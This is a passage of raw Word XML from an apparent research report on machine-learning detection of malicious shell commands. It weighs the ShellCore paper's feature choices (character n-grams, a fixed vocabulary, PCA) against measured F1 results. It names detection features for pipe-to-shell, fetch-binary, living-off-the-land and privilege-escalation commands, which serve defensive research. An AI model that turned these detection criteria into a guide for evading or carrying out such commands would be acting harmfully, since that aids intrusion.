        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>xgboost_hybrid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cnn1d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>). Evidence for each verdict is either ShellCore's</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>own Table 4 ablation (Section 2.1) or our own selection audit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/ch3_feature_decisions.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Six extraction elements were catalogued in Section 2.1. Each was accepted,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>altered or refused on stated grounds, and the grounds are in every case</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>measurements rather than preference — in three of the five cases, ShellCore's</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>own measurements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Adopt — the character-level insight, and the two-representation design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: adopt, but re-encode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The paper's central representational finding is that shell semantics live in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>short tokens and operators, which is why its character model exists at all. We</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>accept that finding completely. We reject only the idea that a raw character bag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>is the sole way to honour it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The reason for re-encoding is the same reason the paper gives for the character</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">model in the first place, applied one step further. If </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">are the informative units, then a feature that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>counts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> them is a strictly more</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>interpretable carrier of the same information than a feature that reports the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TF-IDF weight of the trigram </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>||&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Our structural family — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_pipes</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_redirect_out</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_stderr_merge</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_quotes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>special_ratio</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>digit_ratio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_pipe_to_shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — is that distillation, and Chapter 4 ranks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>each of those against domain intuition, which no character n-gram admits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The re-encoding is not lossless, and we do not pretend otherwise, which is why</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">the character representation is retained </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>alongside</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it rather than replaced.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>xgboost_hybrid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> unions the 43 engineered features with a 3,000-column character</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3–5-gram TF-IDF block, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cnn1d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> consumes raw character indices directly. That</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>architecture is itself inherited: ShellCore's design is two representations of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the same string evaluated in parallel, and ours is two representations of the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">same string </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>fused</w:t>
      </w:r>
      <w:r>
        <w:t>. The measured value of the fusion is not rhetorical — the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>hybrid reaches F1 0.8761 on Dataset 1 and 0.8482 on Dataset 2, against 0.7856</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>and 0.7557 for XGBoost on the engineered features alone. That is roughly nine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>F1 points on both corpora that our hand-written counts do not capture. It is a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>family comparison rather than a controlled ablation, since the hybrid also</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>carries slightly larger trees (500 estimators at depth 7 against 400 at depth 6),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>but a difference of that size is not a tree-budget effect.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Two things we tried in the spirit of the character model did not survive our own</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">gate, and are reported here rather than quietly dropped. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>char_entropy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>token_entropy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — a natural "is this string compressed or obfuscated?" reading of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the character insight — were killed in the 68→43 selection for correlation-cluster</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">redundancy against </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_chars</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>len_tokens</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> respectively, and they were poor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">candidates for a second reason visible in the audit: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>char_entropy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> separates the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">classes at d = +0.29 on Dataset 1 and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>d = −0.09 on Dataset 2</w:t>
      </w:r>
      <w:r>
        <w:t>, a sign</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>inversion of exactly the kind Chapter 5.2 shows does not transfer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>subshell_depth</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_backticks_subshell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> failed the gate outright.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Modify — term-level bag-of-words becomes a fixed, threat-mapped vocabulary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: keep the question, replace the mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Element 1 asks a good question — *which programs and keywords appear in this</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>command?* — and answers it with a vocabulary learned from the training corpus.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We keep the question and fix the vocabulary in advance: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_shell_bin</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_fetch_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_lotl_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_pkg_bin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>head_is_privesc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and their</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>relatives are membership tests against lists chosen from the ATT&amp;CK mapping in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 1.2, before any data was inspected.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The justification is ShellCore's own malware-only ablation. When the vocabulary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>can no longer be shaped by both corpora, term-level file classification falls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>from 99.08 to 67.48 (RF) and from 97.16 to 66.67 (DNN), while the character</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>representation moves by 0.1 points. A representation that loses two thirds of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>its accuracy when it stops seeing the benign corpus was, to that extent,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>encoding the benign corpus. That is the same failure mode our own</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>P8-source-fingerprint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> probe was written to catch, and it is the reason a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>corpus-learned vocabulary is the wrong basis for a detector meant to survive a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>change of corpus.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>A fixed list has three properties a learned one does not: it is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>label-independent, so it cannot absorb provenance; it is small, so it cannot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>memorise; and every member carries a written rationale, so Chapter 4 can rank</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>it against intuition. The cost is real and is stated as a limitation — a fixed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>list cannot recognise a binary nobody listed. The character n-gram block is the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>coverage backstop for exactly that gap, which is the second reason the hybrid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>keeps both representations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Modify — n-grams, bounded</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: adopt, with limits the paper does not impose.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Unbounded 1–5-grams over a full corpus vocabulary produce a feature space large</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>enough that PCA becomes mandatory, which is how element 5 comes to exist. Our</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">block caps the order at 3–5 characters with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>min_df=3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max_features=3000</w:t>
      </w:r>
      <w:r>
        <w:t>, and — the part that matters for validity — is fitted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>inside</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the cross-validation fold as a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FeatureUnion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stage of the pipeline,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>never on the full corpus (Chapter 5.3).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Reject — PCA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: reject.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 4 of this project is required to rank interpretable features against</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>domain intuition and defend the ordering. A principal component is a dense</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>linear combination of thousands of character n-grams; it can be ranked by</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>importance but not argued about. There is also an internal tension in the paper</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>worth naming: ShellCore motivates the shell-command representation partly on the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>grounds that it is explainable, and then projects it into a basis that is not.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>We would rather carry 3,000 sparse columns a tree can split on than 200 dense</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>ones nobody can name. Dimensionality was never our binding constraint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
